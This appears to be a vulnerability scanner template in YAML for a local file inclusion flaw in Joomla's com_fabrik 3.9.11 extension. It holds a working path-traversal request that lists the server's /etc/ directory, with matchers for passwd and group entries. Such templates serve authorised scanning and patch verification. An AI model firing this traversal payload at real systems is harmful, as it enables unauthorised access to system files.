36 lines
914 B
YAML
36 lines
914 B
YAML
id: joomla-com-fabrik-lfi
|
|
|
|
info:
|
|
name: Joomla! com_fabrik 3.9.11 - Local File Inclusion
|
|
author: dhiyaneshDk
|
|
severity: high
|
|
description: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48263
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
tags: joomla,lfi,edb
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"value":"passwd"'
|
|
- '"value":"group"'
|
|
- '"disable":false'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|